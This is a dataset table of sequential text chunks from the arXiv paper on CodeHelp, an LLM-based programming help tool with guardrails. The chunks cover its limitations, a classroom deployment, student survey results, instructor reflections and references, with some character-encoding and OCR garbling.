id
stringlengths 12
15
| title
stringlengths 8
162
| content
stringlengths 1
17.6k
| prechunk_id
stringlengths 0
15
| postchunk_id
stringlengths 0
15
| arxiv_id
stringlengths 10
10
| references
listlengths 1
1
|
---|---|---|---|---|---|---|
2308.06921#25 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | CodeHelp: Using Large Language Models with Guardrails Users Queries id username â #queries wk id user time langâ code error issue response (len) helpful sylvester 603 123 2459. Murray 2023-04-14 132m python dloct.â Survived Recode The Oand 1 values used toenc.. main (1213) 23 Emma 117 "1 2458 Sylvester 2023-04-14 1:31pm python _m_mask = df[/Sex'] ==. using pandas dataframes, how t. main (1264) 49 Bong 156 oO 2487 Kayleigh 2023-04-14 1:28pm python dfloc[:,'Pclass'].rep. â Type Error: list indices must b Im,using pandas, How do |use_ insufficient, (647) 36 Winnie 15 7 main (@75) 35 | [usmes nt n 2456 Kayleigh 2023-04-14 1:27pm python df loc(:,Pelass'].rep. Typettror: list indices must b Im.using pandas, How.do | use main (675) as or ri 2455 James 2023-04-14 1:22pm python df_big_3=dfisin({/Name& iwant to the date frame, insufficient (792) main (1034) 19 Murray 103 1" 2454 Sylvester 2023-04-14 1:17pm python df_sur = df.loc[(dF.locf; using pandas dataframes, how t. main (996) 45 Kayleigh 9s 14 2453. Lynnette 2023-04-14 1:17pm python df view gross =dfset columns ow do create a view of the main (207) 12 Mitchel 89 ° 2452 James 2023-04-14 4:17pm _ python what isthe syntax and documen... main (705) 26 Kerrie % 5 2451 James 2023-04-14 1:16pm python _big_musical = ['The Lion K Typeâ | 2308.06921#24 | 2308.06921#26 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#26 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | ¬tror: isin() takes 2 posi, imin pandas, im looking for t. main (769) x Teo rors7 [die)perpace [« M2 3 4 5 6 > 2450 Murray 2023-04-14 1:14pm python import urllib,request.as reque, Use -locl] to. replace the 1,2 main (825) 1610170 0f 2569 | 10 v|perpage |< 1 18 16 17 18 19. 257 > export csv | Search Figure 8: | 2308.06921#25 | 2308.06921#27 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#27 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | An instructorâ s view of student help requests. The full contents of each field are displayed in a tooltip when the user hovers a mouse pointer over it. Note that real usernames have been replaced with pseudonyms. 4 LIMITATIONS AND RISKS CodeHelp is subject to many of the known limitations and risks of using LLMs. In particular, completions can be factually incorrect and can include harmful biases. The problem of inaccuracies in the LLM responses (sometimes called â hallucinationâ or â confabula- tionâ | 2308.06921#26 | 2308.06921#28 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#28 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | ) is present in CodeHelp with the models it is currently using. Sometimes, the response contains one or more false statements, and this may confuse or mislead the user. Users are sensitised to this issue via the prominent notice above each response saying â Remember: It will not always be correct!â In our experience, when inaccuracies did occur, they were often in a particular detail of the response, which still gave correct high-level guidance or pointed the user in the right direction. In our and our studentsâ experiences, the rate of inaccuracies is low enough for the tool to still be valuable and worth the studentsâ time, and as models improve, the accuracy will improve. LLMs can learn harmful biases such as gender or racial stereo- types from their training data, which can then be reflected in the completions they generate. This is a well-known and heavily studied issue in language model research [36], and it has been an important issue to the computing education community as well [1]. While the models used by CodeHelp have been specifically trained and improved by OpenAI to reduce these biases, some still exist [37]. These models generally do not make offensive statements unless one actively crafts a prompt to elicit one, but for example they might respond in a way that implicitly reflects a common stereotype. This is highly unlikely to occur in the context of requesting help on a specific programming issue, but the possibility exists. The above issues apply to most LLM-based tools, and the likeli- hood of an LLMâ s response being incorrect, harmful, off-topic, or otherwise â off the railsâ increases with additional rounds of user input and model response. | 2308.06921#27 | 2308.06921#29 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#29 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Therefore, by design, every query to CodeHelp is a one-shot request, independent of any others and with no possibility for follow-up or dialogue. This limits the use- fulness of the system, as asking a follow-up question or requesting additional information in the context of an initial response could be very helpful, but the one-shot limitation is imposed to mitigate many of the risks of using LLMs. Users can submit revised queries with additional information or questions informed by an earlier response if they choose to. | 2308.06921#28 | 2308.06921#30 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#30 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | 5 EXPERIENCES AND RESULTS We used CodeHelp in two sections of an undergraduate introductory- level computer- and data-science course taught by an author of this paper in the Spring semester of 2023. Fifty two students completed the course. Of those students, our analyses includes data from 49 who used CodeHelp at least once during the semester, and data from 45 who completed a survey about using CodeHelp at the end of the semester. The course is designed to serve a broad audience and attracts students from across the institution who take the course to meet general education requirements or to meet requirements for data-analytic or data-science related credentials. The course provides twelve weeks of instruction in Python foun- dations and three weeks of instruction in Pandas2 and Seaborn3. The format of the course is â | 2308.06921#29 | 2308.06921#31 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#31 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | flipped,â with students responsible for reading course materials prior to class, while class time is spent working through assignments on lab computers. The instructor and a TA assist students and provide instruction/support as needed. CodeHelp was introduced in the fourth week of the semester with a quick demonstration in class. During class, students were en- couraged to use CodeHelp for assistance first before asking the instructor or TA for help, but they were otherwise free to make their own choices about when and how to use it. 5.1 Student Use Even with no firm requirement to do so, students used CodeHelp consistently throughout the semester. Figure 9 shows that roughly half of the class used CodeHelp each week, and we saw that roughly 70% of the students used CodeHelp in four or more different weeks. We also observed a wide range of intensity of use between students. Roughly 80% of the class submitted 10 or more queries (indicating more than initial trial usage), roughly 50% submitted 30 or more, and seven of the 49 submitted over 100 queries, including one student with more than 600 queries. The heatmap in Figure 10 shows the usage concentrated during two separate class sessions (1 and 2pm on Mon/Wed/Fri) and before assignments were due on Saturday. Otherwise, there was some use across nearly all hours, including many when no instructor or TA would have been available. Overall, | 2308.06921#30 | 2308.06921#32 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#32 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | 2Pandas. Available at: https://pandas.pydata.org/ [accessed 2023-06-20] 3Seaborn. Available at: https://seaborn.pydata.org/ [accessed 2023-06-20] ~ 3 1 & o a 8 1 40 - Percentage of Students Week Figure 9: Percentage of the class (y axis) using CodeHelp each week (x axis) across the semester [7 = spring break]. Note that the y axis scale only extends to 70. The figure shows consistent use across the whole semester. the continuing, consistent usage strongly suggests that the students generally found the tool beneficial. 5.2 Student Survey At the end of the course we distributed an online survey to un- derstand studentsâ perceptions of CodeHelp. Taking the survey was optional, but students did receive extra-credit for completing it. A total of 45 students (87 percent of the class) completed the survey. Table 1 shows the results for a selection of questions about studentsâ | 2308.06921#31 | 2308.06921#33 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#33 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | perceptions of the tool and its value to them. Overall, stu- dents found it valuable, and a large majority (95%) were interested in using it in future CS courses. For additional detail, the survey included the following open- response questions, which were designed to elicit both positive and negative responses: â ¢ Q1: What did you find most beneficial about using Code- Help? â ¢ Q2: Do you think there is anything negative about students using CodeHelp? In general, responses were relatively short but tended to be longer for the first question on beneficial aspects (word count; M = 16.2, SD = 10.3) compared to the second question on negative aspects (M = 12.0, SD = 13.0). To understand the patterns present in the responses, we conducted a thematic analysis in which interesting features of each response were extracted as codes and then collated into higher-level themes [2]. We identified five prominent themes in the response to Q1, highlighted in bold in the text that follows. The most prominent theme by a clear margin, appearing in 19 of the student responses, was around â | 2308.06921#32 | 2308.06921#34 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#34 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | availabilityâ and specifi- cally that students valued the convenience of being able to ask for assistance outside of the classroom when TAs and the professor were busy or unavailable. Responses representative of this theme include: â it was a tool that was always there when I needed it, I didnâ t have to go to office or TA hours or emailâ and â the ability to get help without talking to professor or TAâ . Mark Liffiton, Brad Sheese, Jaromir Savelka, and Paul Denny | 2308.06921#33 | 2308.06921#35 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#35 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | 07:00 09:00 150 11:00 125 a s 13:00 | â | @ ic) ' pT pT mz = Q 15:00 =I 100 8 â S 17:00 i-â | 5 oa 2 19:00 {â â _} â â ® = g = 21:00 â â â 50 o â F 23:00 â 01:00 â P25 03:00 Sun Mon Tue Wed = Thu Fri Sat Day of Week Figure 10: Queries by hour (y axis) and day (x axis) over the whole term. The time span between 4 and 7 AM is not shown due to no activity. The high activity blocks on Mon, Wed, and Fri correspond to the times students were in the classroom. The higher activity on Saturday evening is prior to a recurring deadline for weekly assignments. Many students (11) explicitly appreciated that CodeHelp could aid them in â fixing errorsâ | 2308.06921#34 | 2308.06921#36 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#36 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | , which was the next most common theme. This included getting help to understand error messages and producing explanations of errors. The following are two ex- amples of typical quotes supporting this theme: â it was helpful in understanding some of the error message we hadnâ t learned about in classâ and â it really helps with trouble shooting when it comes to semantic errorsâ . One interesting theme that emerged (10 students), distinct from the â availabilityâ of CodeHelp, was that it supported â indepen- denceâ by enabling students to make progress without the need to seek external help when they were stuck. This included provid- ing initial support to students who had difficulty starting work, nudging students in the right direction when they were close to a solution, and helping students who were anxious to ask for help without the fear of embarrassment. | 2308.06921#35 | 2308.06921#37 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#37 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Comments that supported this theme included â It was nice to have a source to ask when I was unsure how to begin codingâ , â it helped lead me in the right direction if I almost had the right codeâ and â I felt like I could ask it any question, even dumb ones, which I often did to avoid embarrassing myself in front of the Professor or TAâ . The remaining themes, which were less common, focused on the â speedâ (6) with which students could make progress or obtain feedback and the use of CodeHelp to assist with â learning/un- derstandingâ (7). Typical comments aligning with these themes includedâ Helped me work fasterâ and â it helped understand the code I was writing sometimesâ . Students also appreciated that CodeHelp would provide guidance rather than directly revealing the solution, as exemplified by the comment â It gave us help on the answer not just the answer itselfâ | 2308.06921#36 | 2308.06921#38 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#38 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | . Overall, the responses to Q1 tell a story that CodeHelp was seen as a useful resource for obtaining rapid assis- tance and a complementary tool to traditional TA and instructor support. As to the concerns (Q2), we also identified five prominent themes, again highlighted in bold. Around half of the students (24) stated that they had â no concernsâ . Some of the students would even suggest the use of the tool should have been more extensive: â We CodeHelp: Using Large Language Models with Guardrails Table 1: Results for selected questions in the student survey (ð = 45 of 52 students). Rows may not sum to 100% due to rounding. | 2308.06921#37 | 2308.06921#39 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#39 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Strongly Agree Agree Disagree Strongly Disagree CodeHelp helped me complete my work successfully. CodeHelp helped me learn the course material. If I took more Computer Science courses, I would like to be able to use CodeHelp in those classes. 9% 7% 31% 71% 56% 64% 18% 33% 4% 2% 4% 0% should even use it during quizzesâ . Others explained why they did not have any concerns: â No, absolutely not, especially considering it never handed me the answer on a silver platter.â The most prominent theme as to the concerns was the perceived â difficultyâ | 2308.06921#38 | 2308.06921#40 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#40 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | in using CodeHelp. Multiple students (14) stated that the tool is difficult to use when the problem is not understood: â sometimes i didnt know exactly what to ask.. but i usually got there eventuallyâ and â I did not like how hard it was to ask something I do not understand.â . Several students also reported receiving an- swers that were difficult to utilize or not helpful: â There were many times that CodeHelp misunderstood my question and gave me advice which confused me even more.â and â Sometimes it gives really strange responses that are not related to the problemâ . | 2308.06921#39 | 2308.06921#41 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#41 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | CodeHelp was easy to introduce to the class. As an instructional resource, its utility is immediately and obviously apparent. Stu- dents required little convincing to give it a try. While in class, we requested that students ask CodeHelp for help before seeking help from the instructor or teaching assistant. We did not enforce this as a rule but encouraged it throughout the semester. The idea was that CodeHelp could provide an initial level of support and handle rela- tively straightforward but common concerns, such as syntax errors. CodeHelp performed very well in this capacity, and given its flexi- bility and low-cost, it is a great addition to the classroom for this functionality alone. However, CodeHelp also provided much more sophisticated help on a huge range of introductory CS problems throughout the semester. Several students (5) reported that sometimes an answer provided by CodeHelp contained elements that were â | 2308.06921#40 | 2308.06921#42 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#42 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | not coveredâ in class and, hence, the students were not expected to have knowledge of those elements. Responses representative of this theme included: â Sometimes it tells you to do code that we havenâ t learned in classâ and â I would run into the issue where it wanted me to use concepts that I havenâ t been taught yet. This is both and good and a bad thing because it can introduce students to resources, but also confuse them.â . A small number of studentsâ responses (3) were hinting on using CodeHelp without investing proper effort at solving the problem independently (i.e., â over-relianceâ ). The responses suggest that the students were aware this could have negative effects on their learning, yet, they would still engage in that practice: â think some people could complete the code without help and by going directly to CodeHelp their limiting themselvesâ and â I do think that sometimes I can get to dependent on CodeHelp and I have to scale it back a bit.â . Several responses (3) stated that CodeHelp is â not humanâ and, hence, its capabilities are in some way limited as compared to the assistance provided by an instructor or a TA. However, the responses do not go into much detail as why this might be the case: â less personalâ and â No, but it cannot be a substitute for a real person.â One of the responses explained the preference for human assistance in terms of difficulty (see above) of formulating the proper question for CodeHelp: â no but personally I prefer to ask a real person because its difficult to phrase you questions in a way that wonâ t confuse CodeHelpâ . CodeHelp appeared to provide accurate and helpful responses to students the majority of the time. CodeHelp did not â give away the answerâ or otherwise become a complete replacement for ac- tively working through problems. It appears to strike a nice balance between providing enough information to move students forward without undermining the intent of the assignments. CodeHelp was a great addition to the course in terms of serving students who had difficulty attending office hours or who needed frequent reassurance or feedback as they worked through assign- ments outside of class time. It was also exceptional in providing a novel avenue for delivering support to students who did not take advantage of traditional avenues of support. | 2308.06921#41 | 2308.06921#43 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#43 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | For example, some students who seemed uncomfortable, embarrassed, or otherwise re- luctant to ask for help from the instructor or TA had no reservations about asking CodeHelp. CodeHelp sometimes provided assistance that was inconsistent with the content of the class and the knowledge-level of the stu- dents. For example, CodeHelp might suggest solving problems with methods that had not yet been introduced. This was confusing and frustrating for some students. During the semester, the avoid set functionality (Section 3.3) was added to allow the instructor to explicitly prohibit certain kinds of content in CodeHelp responses, which largely resolved the problem. Students sometimes provided too little information describing their problem to get a useful re- sponse and required some coaching to provide detailed or thought- ful descriptions of problems to CodeHelp. 5.3 Instructor Reflections After the conclusion of the semester, the instructor, who is also one of the authors, reflected on what did and did not work: Reviewing student queries submitted to CodeHelp provided an entirely new type of insight into student learning. In comparison to submitted work, the queries were a much more direct and unfiltered look into student thinking as they worked through problems. | 2308.06921#42 | 2308.06921#44 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#44 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | On some occasions, this feedback guided modifications of assignments and additional class instruction during the semester. Overall, given its great utility in a wide range of circumstances, its ease of use, and low cost, I found CodeHelp to be a tremen- dous asset in my course. I intend to continue using it in all of my introductory courses moving forward. 6 RECOMMENDED PRACTICES Based on our experiences, we have collected a few recommenda- tions for integrating CodeHelp into a class effectively. Initial introduction. When first introducing CodeHelp to stu- dents, motivate its use by sharing some of the benefits identified in this work, as relevant to your course. Explain carefully its strengths and limitations in the context of your course: how it will likely be able to help, and where may it produce incorrect responses. Provide guidance on how to ask for help most effectively. This in- cludes providing the relevant portions of oneâ s code, identifying and copying the important information from error messages, and providing enough information for the issue to be identified. These are the same skills one needs to effectively communicate issues to instructors or peers. Providing good and bad examples or taking a moment to roleplay a few situations may help here. Demonstrate CodeHelp with a few issues similar to those you expect your stu- dents to encounter. Model how to provide sufficient information and communicate clearly. During Use. Throughout the course, while students are using CodeHelp, it is helpful to view the studentsâ queries regularly. You can gain detailed insight into where they are struggling at each point in the term that may lead to adapting course plans. Addi- tionally, you might identify students whose usage is not effective (e.g., repeatedly submitting ineffective queries or demonstrating over-reliance), and reach out to them directly to provide guidance or a nudge. Instructors and TAs should sample CodeHelpâ s responses in each section of the course to spot and mitigate issues. For example, if CodeHelp suggests a technique, function, or concept that does not fit the design of your course, you can add that to the avoid set (Section 3.3) to prevent it from being used in future responses. 7 CONCLUSION AND FUTURE WORK This work shows that LLMs, when properly implemented and inte- grated into a learning environment, can be a valuable aid to both students and educators. | 2308.06921#43 | 2308.06921#45 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#45 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | We developed CodeHelp to provide imme- diate, high-quality support to students working on programming exercises while mitigating the risk of fostering an over-reliance on the automated assistance. Providing an automated option for this kind of help can increase the level of support students receive throughout a course due to a combination of being constantly avail- able and avoiding the anxiety associated with asking a professor or TA for help. In our pilot study, students found CodeHelp to be a welcome addition to direct support from a professor and teaching assistants. Going forward, we intend to continue developing and improv- ing CodeHelp. | 2308.06921#44 | 2308.06921#46 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#46 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | The â avoid setâ functionality proved to be critical for obtaining course-appropriate responses in many cases, and we Mark Liffiton, Brad Sheese, Jaromir Savelka, and Paul Denny plan to give instructors more ways to provide context about their courses and thus further tailor the LLM responses for their students. Additionally, we plan to explore different forms or levels of inter- vention that might be appropriate depending on the complexity of the task, the experience level of the student, or even the specific learning objectives of the course. And we see many opportunities for the tool to be more individualized, adapting to the needs of each student. For example, it could record and maintain information about each individual studentâ s mastery of different topics, using that to guide the responses generated for them. While encouraging, this work presents only an initial exploration into the effective deployment of LLMs in computing education. For example, while students positively rated CodeHelp and the instruc- tor found it easy to use and deploy, future work should establish more robust metrics for gauging efficacy, such as measuring impact on student learning outcomes or comparing student performance in classrooms that use CodeHelp to those that do not. We also recognize that further work needs to be conducted with larger, more diverse populations of students. It would also be inter- esting to deploy CodeHelp in different educational settings, such as in distance learning or self-paced programming courses, to evaluate its flexibility and adaptability. Our findings could have implications beyond computing educa- tion. LLMs such as those used in CodeHelp could potentially be adapted to support learning in other domains. We hope that our work serves as an impetus for other researchers and educators to explore the use of LLMs in diverse educational contexts, continuing the dialogue around the opportunities and challenges they present. REFERENCES [1] Brett A Becker, Paul Denny, James Finnie-Ansley, Andrew Luxton-Reilly, James Prather, and Eddie Antonio Santos. 2023. | 2308.06921#45 | 2308.06921#47 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#47 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Programming Is Hard-Or at Least It Used to Be: Educational Opportunities and Challenges of AI Code Generation. In Proceedings of the 54th ACM Technical Symposium on Computer Science Education V. 1. 500â 506. [2] Virginia Braun and Victoria Clarke. 2006. Using thematic analysis in psychology. Qualitative Research in Psychology 3, 2 (2006), 77â 101. https://doi.org/10.1191/ 1478088706qp063oa [3] Peter Brusilovsky, Barbara J Ericson, Cay S Horstmann, and Christian Servin. 2023. The Future of Computing Education Materials. (2023). [4] Gustavo Carreira, Leonardo Silva, Antonio Jose Mendes, and Hugo Goncalo Oliveira. 2022. | 2308.06921#46 | 2308.06921#48 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#48 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Pyo, a Chatbot Assistant for Introductory Programming Students. In 2022 International Symposium on Computers in Education (SIIE). IEEE, Coimbra, Portugal, 1â 6. https://doi.org/10.1109/SIIE56031.2022.9982349 [5] Bei Chen, Fengji Zhang, Anh Nguyen, Daoguang Zan, Zeqi Lin, Jian-Guang Lou, and Weizhu Chen. 2022. | 2308.06921#47 | 2308.06921#49 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#49 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | CodeT: Code Generation with Generated Tests. arXiv:2207.10397 [cs.CL] [6] Mark Chen, Jerry Tworek, Heewoo Jun, Qiming Yuan, Henrique Ponde de Oliveira Pinto, Jared Kaplan, Harri Edwards, Yuri Burda, Nicholas Joseph, Greg Brockman, et al. 2021. Evaluating large language models trained on code. arXiv:2107.03374 [cs.LG] Jonathan E Collins. 2023. | 2308.06921#48 | 2308.06921#50 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#50 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Policy Solutions: Policy questions for ChatGPT and artificial intelligence. Phi Delta Kappan 104, 7 (2023), 60â 61. [8] Tyne Crow, Andrew Luxton-Reilly, and Burkhard Wuensche. 2018. Intelligent tutoring systems for programming education: a systematic review. In Proceed- ings of the 20th Australasian Computing Education Conference. ACM, Brisbane Queensland Australia, 53â 62. https://doi.org/10.1145/3160489.3160492 [9] Paul Denny, Viraj Kumar, and Nasser Giacaman. 2023. | 2308.06921#49 | 2308.06921#51 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#51 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Conversing with Copi- lot: Exploring Prompt Engineering for Solving CS1 Problems Using Natu- ral Language. In Proceedings of the 54th ACM Technical Symposium on Com- puter Science Education V. 1. ACM, Toronto ON Canada, 1136â 1142. https: //doi.org/10.1145/3545945.3569823 [10] Paul Denny, Juho Leinonen, James Prather, Andrew Luxton-Reilly, Thezyrie Amarouche, Brett A. Becker, and Brent N. Reeves. 2023. | 2308.06921#50 | 2308.06921#52 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#52 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Promptly: Using Prompt Problems to Teach Learners How to Effectively Utilize AI Code Generators. arXiv:2307.16364 [cs.HC] CodeHelp: Using Large Language Models with Guardrails [11] Paul Denny, James Prather, Brett A. Becker, James Finnie-Ansley, Arto Hellas, Juho Leinonen, Andrew Luxton-Reilly, Brent N. Reeves, Eddie Antonio San- tos, and Sami Sarsa. 2023. Computing Education in the Era of Generative AI. arXiv:2306.02608 [cs.CY] James Finnie-Ansley, Paul Denny, Brett A Becker, Andrew Luxton-Reilly, and James Prather. 2022. The robots are coming: Exploring the implications of openai codex on introductory programming. In Proceedings of the 24th Australasian Computing Education Conference. 10â 19. https://doi.org/10.1145/3511861.3511863 [13] Zhikai Gao, Sarah Heckman, and Collin Lynch. 2022. | 2308.06921#51 | 2308.06921#53 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#53 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Who Uses Office Hours? A Comparison of In-Person and Virtual Office Hours Utilization. In Proceedings of the 53rd ACM Technical Symposium on Computer Science Education - Volume 1 (Providence, RI, USA) (SIGCSE 2022). Association for Computing Machinery, New York, NY, USA, 300â 306. https://doi.org/10.1145/3478431.3499334 [14] Arto Hellas, Juho Leinonen, Sami Sarsa, Charles Koutcheme, Lilja Kujanpää, and Juha Sorva. 2023. | 2308.06921#52 | 2308.06921#54 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#54 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Exploring the Responses of Large Language Models to Beginner Programmersâ Help Requests. arXiv:2306.05715 [cs.CY] [15] Sajed Jalil, Suzzana Rafi, Thomas D. LaToza, Kevin Moran, and Wing Lam. 2023. ChatGPT and Software Testing Education: Promises & Perils. In 2023 IEEE International Conference on Software Testing, Verification and Valida- tion Workshops (ICSTW). IEEE. https://doi.org/10.1109/icstw58534.2023.00078 arXiv:arXiv:2302.03287 | 2308.06921#53 | 2308.06921#55 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#55 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | [16] Enkelejda Kasneci, Kathrin Sessler, Stefan Küchemann, Maria Bannert, Daryna Dementieva, Frank Fischer, Urs Gasser, Georg Groh, Stephan Günnemann, Eyke Hüllermeier, Stepha Krusche, Gitta Kutyniok, Tilman Michaeli, Claudia Nerdel, Jürgen Pfeffer, Oleksandra Poquet, Michael Sailer, Albrecht Schmidt, Tina Seidel, Matthias Stadler, Jochen Weller, Jochen Kuhn, and Gjergji Kasneci. 2023. | 2308.06921#54 | 2308.06921#56 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#56 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | ChatGPT for good? On opportunities and challenges of large language models for education. Learning and Individual Differences 103 (2023), 102274. https://doi.org/10.1016/j.lindif.2023.102274 [17] Majeed Kazemitabaar, Justin Chow, Carl Ka To Ma, Barbara J. Ericson, David Weintrop, and Tovi Grossman. 2023. Studying the Effect of AI Code Generators on Supporting Novice Learners in Introductory Programming. In Proceedings of the 2023 CHI Conference on Human Factors in Computing Systems (Hamburg, Germany) (CHI â | 2308.06921#55 | 2308.06921#57 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#57 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | 23). Association for Computing Machinery, New York, NY, USA, Article 455, 23 pages. https://doi.org/10.1145/3544548.3580919 [18] Hieke Keuning, Johan Jeuring, and Bastiaan Heeren. 2019. A Systematic Lit- erature Review of Automated Feedback Generation for Programming Exer- cises. ACM Transactions on Computing Education 19, 1 (March 2019), 1â 43. https://doi.org/10.1145/3231711 [19] Mario Konecki, Nikola Kadoic, and Rok Piltaver. 2015. | 2308.06921#56 | 2308.06921#58 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#58 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Intelligent assistant for helping students to learn programming. In 2015 38th International Convention on Information and Communication Technology, Electronics and Microelectronics (MIPRO). IEEE, Opatija, Croatia, 924â 928. https://doi.org/10.1109/MIPRO.2015. 7160406 Juho Leinonen, Paul Denny, Stephen MacNeil, Sami Sarsa, Seth Bernstein, Joanne Kim, Andrew Tran, and Arto Hellas. 2023. | 2308.06921#57 | 2308.06921#59 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#59 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Comparing Code Explanations Created by Students and Large Language Models. arXiv:2304.03938 [cs.CY] [21] Mariam Mahdaoui, Said Nouh, My Seddiq ELKASMI Alaoui, and Mounir Sadiq. 2022. Comparative study between automatic hint generation approaches in Intelligent Programming Tutors. Procedia Computer Science 198 (2022), 391â 396. https://doi.org/10.1016/j.procs.2021.12.259 Jessica McBroom, Irena Koprinska, and Kalina Yacef. 2022. A Survey of Auto- mated Programming Hint Generation: The HINTS Framework. Comput. | 2308.06921#58 | 2308.06921#60 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#60 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Surveys 54, 8 (Nov. 2022), 1â 27. https://doi.org/10.1145/3469885 [23] Nhan Nguyen and Sarah Nadi. 2022. An empirical evaluation of GitHub copilotâ s code suggestions. In Proceedings of the 19th International Conference on Mining Software Repositories. ACM, Pittsburgh Pennsylvania, 1â 5. https://doi.org/10. 1145/3524842.3528470 | 2308.06921#59 | 2308.06921#61 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#61 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | [24] Chinedu Wilfred Okonkwo and Abejide Ade-Ibijola. 2021. Python-Bot: A Chatbot for Teaching Python Programming. Engineering Letters 29 (02 2021), 25â 34. [25] Chinedu Wilfred Okonkwo and Abejide Ade-Ibijola. 2022. Revision-Bot: A IAENG Chatbot for Studying Past Questions in Introductory Programming. International Journal of Computer Science 49, 3 (2022). | 2308.06921#60 | 2308.06921#62 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#62 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | [26] Zachary A. Pardos and Shreya Bhandari. 2023. Learning gain differences between ChatGPT and human tutor generated algebra hints. arXiv:2302.06871 [cs.CY] James Prather, Paul Denny, Juho Leinonen, Brett A Becker, Ibrahim Albluwi, Michael E Caspersen, Michelle Craig, Hieke Keuning, Natalie Kiesler, Tobias Kohn, et al. 2023. | 2308.06921#61 | 2308.06921#63 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#63 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | Transformed by Transformers: Navigating the AI Coding Revolution for Computing Education: An ITiCSE Working Group Conducted by Humans. In Proceedings of the 2023 Conference on Innovation and Technology in Computer Science Education V. 2. 561â 562. James Prather, Brent N. Reeves, Paul Denny, Brett A. Becker, Juho Leinonen, Andrew Luxton-Reilly, Garrett Powell, James Finnie-Ansley, and Eddie Antonio Santos. 2023. | 2308.06921#62 | 2308.06921#64 | 2308.06921 | [
"2304.03938"
]
|
2308.06921#64 | CodeHelp: Using Large Language Models with Guardrails for Scalable Support in Programming Classes | "Itâ s Weird That it Knows What I Want": Usability and Interactions with Copilot for Novice Programmers. arXiv:2304.02491 [cs.HC] 27 28 [29] Margot Rutgers. 2021. Duckbot: A chatbot to assist students in programming tutorials. Masterâ s thesis. University of Twente. [30] Sami Sarsa, Paul Denny, Arto Hellas, and Juho Leinonen. 2022. | 2308.06921#63 | 2308.06921#65 | 2308.06921 | [
"2304.03938"
]
|
